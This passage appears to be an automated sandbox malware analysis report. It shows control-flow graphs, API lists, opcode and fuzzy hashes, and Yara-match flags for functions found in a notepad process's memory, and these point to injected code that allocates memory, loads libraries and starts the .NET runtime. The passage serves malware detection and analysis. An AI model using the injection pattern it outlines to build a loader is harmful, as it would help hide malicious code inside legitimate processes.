87 2885743af1a-2885743af1c 70->87 88 2885743af15-2885743af17 70->88 73->63 81 2885743ace7-2885743acf1 73->81 74->63 92 2885743acd5-2885743acdc 74->92 75->76 82 2885743ac50-2885743ac61 75->82 76->64 83 2885743ac67-2885743ac80 LoadLibraryA 76->83 77->70 90 2885743acfb-2885743ad02 81->90 91 2885743acf3-2885743acf4 81->91 82->68 82->76 83->62 86->66 86->67 87->44 88->87 93 2885743ad36-2885743ad3a 90->93 94 2885743ad04-2885743ad05 90->94 91->90 92->90 96 2885743ae48-2885743ae50 93->96 97 2885743ad40-2885743ad62 93->97 98 2885743ad07 call 28857439cab 94->98 100 2885743aea2-2885743aea8 call 2885743b35b 96->100 101 2885743ae52-2885743ae58 96->101 97->63 110 2885743ad68-2885743ad7f call 2885743c2d7 97->110 99 2885743ad0c-2885743ad0e 98->99 102 2885743ad1d-2885743ad20 call 28857439dc3 99->102 103 2885743ad10-2885743ad17 99->103 100->63 106 2885743ae5a-2885743ae60 101->106 107 2885743ae6f-2885743ae81 call 2885743a8bb 101->107 113 2885743ad25-2885743ad27 102->113 103->63 103->102 106->63 111 2885743ae62-2885743ae6d call 2885743b7e3 106->111 118 2885743ae93-2885743aea0 call 2885743a35b 107->118 119 2885743ae83-2885743ae8e call 2885743af23 107->119 123 2885743ada2-2885743adc9 110->123 124 2885743ad81-2885743ad84 110->124 111->63 113->93 117 2885743ad29-2885743ad30 113->117 117->63 117->93 118->63 119->118 123->63 130 2885743adcf-2885743ae43 123->130 124->96 126 2885743ad8a-2885743ad9d call 2885743c05b 124->126 131 2885743ae45-2885743ae46 126->131 130->63 130->131 131->96
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFreeLibraryLoad
                        • String ID:
                        • API String ID: 2147011437-0
                        • Opcode ID: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                        • Instruction ID: f26ea494a9ecb9a4f331e868476c1793c1b2ae8c2d865fe5527c5be6ec673721
                        • Opcode Fuzzy Hash: fe28ec89fccc7c30a97a41b99cb39f37780980cf65fc522e14c47b80859a8ba4
                        • Instruction Fuzzy Hash: 39D18734395A084BE779FA68C4997AA73D1FB48311FD5C52DE48FC3186DE38D8868B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000002885743AF23 Relevance: .4, Instructions: 409COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 187 2885743af23-2885743af73 188 2885743af79-2885743af8c 187->188 189 2885743b171-2885743b1af 187->189 192 2885743b168-2885743b16c 188->192 193 2885743af92-2885743afa6 188->193 196 2885743b340-2885743b35a 189->196 197 2885743b1b5-2885743b1e4 189->197 194 2885743b33d-2885743b33e 192->194 193->194 199 2885743afac-2885743afdd 193->199 194->196 203 2885743b32e-2885743b338 197->203 204 2885743b1ea-2885743b20b 197->204 206 2885743afe3-2885743b001 199->206 207 2885743b111-2885743b13c 199->207 203->194 211 2885743b325-2885743b326 204->211 212 2885743b211-2885743b21d 204->212 217 2885743b0a7-2885743b0ed 206->217 218 2885743b007-2885743b064 206->218 210 2885743b146-2885743b149 207->210 210->194 214 2885743b14f-2885743b163 210->214 211->203 215 2885743b2c9-2885743b2cc 212->215 216 2885743b223-2885743b263 212->216 214->194 219 2885743b2ce-2885743b315 215->219 220 2885743b320-2885743b321 215->220 216->215 235 2885743b265-2885743b271 216->235 234 2885743b0f5-2885743b109 217->234 236 2885743b06a-2885743b06b 218->236 237 2885743b0ef-2885743b0f0 218->237 219->220 230 2885743b317-2885743b318 219->230 220->211 230->220 234->207 235->215 238 2885743b273-2885743b279 235->238 239 2885743b06e-2885743b0a0 236->239 237->234 240 2885743b27c-2885743b2a7 238->240 245 2885743b0a2-2885743b0a5 239->245 246 2885743b2a9-2885743b2b2 240->246 247 2885743b2b4-2885743b2c7 240->247 245->234 246->247 247->215 247->240
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                        • Instruction ID: 22b818801e3268296137bc4291d20f468e5c9d58192d557aba9433552903459b
                        • Opcode Fuzzy Hash: 7e9fd2fb88d1716d08f008b0402716a762c67916f2753a03cfe5ae87c672b0fa
                        • Instruction Fuzzy Hash: 5AE16E31508B488BDB59EF68C889BAAB7E1FF94300F54862DE84ECB155DF34E585CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0000028857439DC3 Relevance: 7.6, APIs: 5, Instructions: 125memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                        • Instruction ID: cbe9207843c33fef3047712fc28ac502282e2f9c2026992179e01d5537f4aac9
                        • Opcode Fuzzy Hash: 1e619bdf4bf7d8a1f72fe11a15149652bafd81afc1c25810297ea3c6b5571fd2
                        • Instruction Fuzzy Hash: 2A31C33170CA094FEB58BA9CE88E26A73D5EB94311F558129EC4FC32C5DD68DD4287C1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0000028857439CB8 Relevance: 7.6, APIs: 5, Instructions: 115memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                        • Instruction ID: d790206753ee0f2c289af15a8a69d1462b9a8e854e1290659403c3bf6dce7e2f
                        • Opcode Fuzzy Hash: cb0b48a04ba6d100bcb83f194f8859affeb3638fd54d705697e528f09cea4154
                        • Instruction Fuzzy Hash: 88319035308A084BDBA8BA9CD85D25973D2EBD8320F458259DC1FC72C9EE68DD4187C5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000002885743A8BB Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 135 2885743a8bb-2885743a8f5 136 2885743a8fb-2885743a90e CLRCreateInstance 135->136 137 2885743a9b5-2885743a9b7 135->137 138 2885743a98d-2885743a98e 136->138 139 2885743a910-2885743a94a 136->139 140 2885743a9b9-2885743a9bf 137->140 141 2885743a9c4-2885743a9d0 137->141 142 2885743a990-2885743a992 138->142 151 2885743a988-2885743a98b 139->151 152 2885743a94c-2885743a95f 139->152 143 2885743aae7-2885743ab02 140->143 147 2885743a9d6-2885743aa25 SysAllocString 141->147 148 2885743aae4-2885743aae5 141->148 142->141 144 2885743a994-2885743a9ad 142->144 144->137 147->148 158 2885743aa2b-2885743aa41 147->158 148->143 151->142 152->144 155 2885743a961-2885743a969 152->155 155->142 156 2885743a96b-2885743a981 155->156 159 2885743a986 156->159 158->148 161 2885743aa47-2885743aa78 158->161 159->142 161->148 163 2885743aa7a-2885743aa86 161->163 164 2885743aa88-2885743aa9b 163->164 165 2885743aa9d-2885743aaa9 163->165 164->164 164->165 166 2885743aab1-2885743aac3 165->166 167 2885743aadb-2885743aadc 166->167 168 2885743aac5-2885743aad9 166->168 167->148 168->167 168->168
                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocCreateInstanceString
                        • String ID:
                        • API String ID: 218245030-0
                        • Opcode ID: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                        • Instruction ID: 71663abfd6255e724b6b1a9d48f9af92fdafe2b9777655917543c72f55b903e3
                        • Opcode Fuzzy Hash: 5cd5b7eee56912e5f7479b10a49db03511dafd728bb5732e75b1c7ea787b1245
                        • Instruction Fuzzy Hash: 9C814231348A088FDB68EF28C888BA6B7E5FFA5301F418A6DD49FC7151DE35E5458B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0000028857439CAB Relevance: 1.5, APIs: 1, Instructions: 35memorylibraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                        • Instruction ID: b706089878e96558b3eedcdcd6f64e243bce120998d41d7bdb03f2d81a9f7c4a
                        • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                        • Instruction Fuzzy Hash: 5BE0203120CA0D0FF768A6DDD84E7B666D8D796275F40003EF54EC2141E545D8D203D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF849000589 Relevance: .3, Instructions: 279COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95e32d529cf587da912ec400ac959313b1b954a276579f163edf0f96ea77d0bb
                        • Instruction ID: 5556827f4e5b093236fa49750b8e96cd0eda5171c657f4cdba83cde6d2b9ad03
                        • Opcode Fuzzy Hash: 95e32d529cf587da912ec400ac959313b1b954a276579f163edf0f96ea77d0bb
                        • Instruction Fuzzy Hash: 3E811721E0EACA4FEBAAAB3854256797FB1EF56384B4401FAC04DCB2D3DD1C5A45C352
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF849000CA2 Relevance: .2, Instructions: 226COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 303 7ff849000ca2-7ff849000d44 311 7ff849000d46-7ff849000d4b 303->311 312 7ff849000d4d-7ff849000d51 303->312 313 7ff849000d54-7ff849000d6e 311->313 312->313 315 7ff849000d70-7ff849000da7 313->315 316 7ff849000dad-7ff849000df3 313->316 323 7ff849000df4-7ff849000e53 315->323 324 7ff849000da9-7ff849000dab 315->324 330 7ff849000e5a-7ff849000e8c 323->330 324->315 324->316
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bb45377d7dd7d9e993410ea7dcb32da202a022dab6f699dd2d747835b406cb21
                        • Instruction ID: 5a7c00ed6439b4d03b44212b1a1676b8dfab25dfa9aa6dbd500c4900449d327c
                        • Opcode Fuzzy Hash: bb45377d7dd7d9e993410ea7dcb32da202a022dab6f699dd2d747835b406cb21
                        • Instruction Fuzzy Hash: E3613B20A0EAC64FE756AB3C54152757FE1EF87250B4900FBD48DCB2A3DC189C46C362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF849000836 Relevance: .2, Instructions: 167COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d7095627defc9e06d2923e050186c7418dc141e0a17cbad0b65e1e4878838ed
                        • Instruction ID: 20370db0143e00aa8d602b92c8299b48d86d83bb3c3e5430ee2dc2f898a478b5
                        • Opcode Fuzzy Hash: 7d7095627defc9e06d2923e050186c7418dc141e0a17cbad0b65e1e4878838ed
                        • Instruction Fuzzy Hash: 5B413821B1DA890FE799AB3C545A2797BD2EF9A255F0901FFE04DC72A3CD188C06C341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8490009A9 Relevance: .2, Instructions: 160COMMON
                        Download Yara Rule

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f83281a7eb06b8d41ac431576e88f92ebd03bde2b7dfb8a25a350313743d5a2
                        • Instruction ID: c935c9bcdd83ab00c790d785606ee9fdace48cb237c8d764aba08b2769646485
                        • Opcode Fuzzy Hash: 2f83281a7eb06b8d41ac431576e88f92ebd03bde2b7dfb8a25a350313743d5a2
                        • Instruction Fuzzy Hash: DE51A12091EB8A9FEB46EB7894106A9BFB1EF4B340F9401F6D048DB293DD2C5A44C721
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8490000C8 Relevance: .1, Instructions: 141COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 380 7ff8490000c8-7ff8490009a4
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fec51f9788626b34dd559d2dbbcd81746f8d7b052a02e8dc2fce5d62343a92c3
                        • Instruction ID: f25d02ddfd45abfff318036fc4dac1b10fe97e77d3b67538148908351389c414
                        • Opcode Fuzzy Hash: fec51f9788626b34dd559d2dbbcd81746f8d7b052a02e8dc2fce5d62343a92c3
                        • Instruction Fuzzy Hash: B931D321B1D9491FE798FE2C545A27DB7D2EF9D355F0501BAE04EC72A3DE289C418341
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF849000B2D Relevance: .1, Instructions: 124COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 401 7ff849000b2d-7ff849000c44 call 7ff849000190 423 7ff849000c49-7ff849000c59 401->423
                        Memory Dump Source
                        • Source File: 00000004.00000002.2891472954.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_7ff849000000_notepad.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 735c99694de1c86f981a55272605f70dea9c6e950b137b7665be9a499644d8f8
                        • Instruction ID: e49d338a0c7146d1efe94c9c98e4e1a67d03da5b48ba56cc820185ed4e245347
                        • Opcode Fuzzy Hash: 735c99694de1c86f981a55272605f70dea9c6e950b137b7665be9a499644d8f8
                        • Instruction Fuzzy Hash: 9231C620F1994A8FEB84BB78585A3BDB7E2FF98745F1401BAE40DC3193EE2C98418751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 000002885743B35B Relevance: .5, Instructions: 500COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                        • Instruction ID: b67f3418ab9e85ffab3f5274c0d614fb92838479c910f71f2bdefcf065e21420
                        • Opcode Fuzzy Hash: f79c8a23afe56d11b94332f0aa4a683b06ab6a29ecf11af3662490c09a5fc48f
                        • Instruction Fuzzy Hash: 78F1B134255A098BEB78EF68C8497A6B3D1FB54311F95C62DD88AC3281DF38E842C7C1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000002885743B7E3 Relevance: .3, Instructions: 283COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                        • Instruction ID: 04a2e5a59350fb1f51084feee2fd5e312d1f86a68799e0d939dc001244735dc1
                        • Opcode Fuzzy Hash: e8c66e5bdd5a090d70eb4ffc53b9627ae5a0aff87d1d0b46004e79355c561afd
                        • Instruction Fuzzy Hash: F4A10D31608A4C8FDB65EF68C889BDA77E5FBA8315F10462AE44AC7160EF30D645CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0000028857439EDB Relevance: .3, Instructions: 257COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028857430000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_28857430000_notepad.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                        • Instruction ID: 3fd86b539d745005f89470ba92e16b77a1b57902c953c7f23a6e66032217c26d
                        • Opcode Fuzzy Hash: c0fe8602adeed2f167eb202e12a10f3e3af28f60814960b5ae7f64c00d27349f
                        • Instruction Fuzzy Hash: E1818434658B494BDB68EF64C8897EAB7E4FB58301F41862DE89FC2141EF34E5458BC1
                        Uniqueness

                        Uniqueness Score: -1.00%